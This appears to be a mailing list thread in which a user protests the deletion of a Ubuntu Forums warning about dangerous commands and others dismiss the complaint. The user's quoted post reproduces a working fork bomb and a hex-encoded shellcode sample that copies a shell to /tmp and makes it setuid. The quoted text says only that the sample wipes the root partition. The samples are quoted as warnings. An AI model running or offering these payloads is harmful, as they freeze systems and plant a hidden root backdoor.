The article that have spoken about Linux malicious commands that was posted in Ubuntu Forums was restored, but who accessed this link yesterday and this morning saw that this article has been deleted.

The article that have spoken about Linux malicious commands that was posted in Ubuntu Forums was restored, but who accessed this link yesterday and this morning saw that this article has been deleted.

Command FreeBSD

The article that have spoken about Linux malicious commands that was posted in Ubuntu Forums was restored, but who accessed this link yesterday and this morning saw that this article has been deleted.

Very strange!

I also posted this topic in Ask Ubuntu Estack Overflow Exchange: https://askubuntu.com/questions/1103483/why-the-article-that-have-spoken-about-linux-malicious-commands-that-was-posted?noredirect=1#comment1819053_1103483

I want to tell for the newbies to Linux that the article that have spoken about Linux malicious commands that was posted in Ubuntu Forums was deleted: https://ubuntuforums.org/announcement.php?f=326

The following messages was written in this article that was posted in Ubuntu Forums:

[quote] Ubuntu Forums has a strict zero-tolerance policy when it comes to posting dangerous commands. In the past members have been banned for posting dangerous commands. If the intent is malicious, this is simply unnacceptable. If it is meant as a joke – it is not funny.

Please be cautious when a command is suggested or if directed to download script/s as a solution to a problem. When in doubt as to the safety of the procedure, it's always a good idea to wait for more opinions, and/or have the command explained and verify if the explanation makes sense by consulting readily available documentation on Linux commands (such as manpages). If you have any doubts about the content of a command or script, report the post/thread and forum staff will investigate.

Please take care when posting commands or scripts to assist other users. Post only well known, documented and current commands appropriate for the operating system in use, or scripts from reputable sources. If you do post commands in order to help someone but which have the potential to be dangerous, always make sure you warn possible users of the dangers, not just to the user you are helping, but others who may come across the post later. If posting scripts that help with various tasks, please be prepared to provide a source and description of the content. [/quote]

[quote] Forkbomb: It is a malicious script that will execute a huge number of processes until your system freezes, forcing you to do a hard reboot which may cause data corruption or data damage.

The below command looks really intriguing and curiosity may lead new and inexperienced users to execute it! DON'T EXECUTE THEM! [/quote]

[code] :(){ :|:& };:[/code]

[quote] The below command is nothing but the first command above (rm -rf). Here the codes are hidden in hex so that an ignorant user may be fooled. Running the below code in your terminal will wipe your root partition.

This command here shows that the threat may be hidden and not normally detectable sometimes. You must be aware of what you are doing and what would be the result. Don’t compile/run codes from an unknown source.

char esp[] attribute ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”; [/quote]

The messages that I quoted above was written in following link: https://ubuntuforums.org/announcement.php?f=326

This article have opoken about Linux malicious commands.

Why this article that have spoken about Linux malicious commands that was posted in Ubuntu Forums was deleted?

I posted this topic in Ubuntu Forums, but this topic was moved to The Jail and then deleted.

It appears that Ubuntu Forums administrators want to fool the newbies.

EDIT:

I want to tell for the newbies to Linux that the article that have spoken about Linux malicious commands that was posted in Ubuntu Forums was deleted and that it appears that Ubuntu Forums administrators want to fool the newbies: https://ubuntuforums.org/announcement.php?f=326

Who accessed the Ubuntu Forums this morning saw that I posted about malicious commands in General Help and News to Ubuntu in Ubuntu Forums, but the topics that I posted in Ubuntu Forums was deleted. Very strange! It appears that Ubuntu Forums administrators want to fool the newbies.

Re: The article that have spoken about Linux malicious commands that was posted in Ubuntu Forums was restored, but who accessed this link yesterday and this morning saw that this article has been deleted.

Tom H-4
On Fri, Dec 21, 2018 at 5:19 AM Command FreeBSD
<[hidden email]> wrote:

> I am revolted against the injustice of Ubuntu Forums administrators and moderators.

And we don't care that you are.

Any site, run by Ubuntu or not, can have and enforce its own set of rules.

Re: The article that have spoken about Linux malicious commands that was posted in Ubuntu Forums was restored, but who accessed this link yesterday and this morning saw that this article has been deleted.

ubuntu-users mailing list
On Fri, 21 Dec 2018 15:41:33 +0100, Tom H wrote:
>On Fri, Dec 21, 2018 at 5:19 AM Command FreeBSD wrote:
>> I am revolted against the injustice of Ubuntu Forums administrators
>> and moderators.
>
>And we don't care that you are.
>
>Any site, run by Ubuntu or not, can have and enforce its own set of
>rules.

Who cars about a dangerous command at all, if actually the most
malicious failures are missing backups? Overvoltage protection of a
multi socket gains less, if anything at all, since it's the last stage
of a three-way protection system and usually the 2 stages required
before the overvoltage protection of a multi socket are missing. OTOH
deleting hints regarding rm commands, fork bombs or how to bypass
passwords by a chroot or systemd doesn't make much sense either ;).

Re: The article that have spoken about Linux malicious commands that was posted in Ubuntu Forums was restored, but who accessed this link yesterday and this morning saw that this article has been deleted.

Command FreeBSD
Can any site enforce injustice?

<[hidden email]> wrote:

> I am revolted against the injustice of Ubuntu Forums administrators and moderators.

And we don't care that you are.

Any site, run by Ubuntu or not, can have and enforce its own set of rules.

Re: The article that have spoken about Linux malicious commands that was posted in Ubuntu Forums was restored, but who accessed this link yesterday and this morning saw that this article has been deleted.

Ken D'Ambrosio

On 2018-12-21 11:32, Command FreeBSD wrote:

Can any site enforce injustice?

Wow.  You have a pretty amazing opinion of yourself, don't you?  Like you're the first person to ever learn what he word "moderated" in "moderated e-mail list" means.  Personally, I didn't find your post terribly dangerous.  But it was mind-numblingly boring, and verging on stream-of-consciousness in its indecipherability.  And now your ego's hurt, too, and you cry for "justice."

Again: wow.

"Nothing to see here; move along."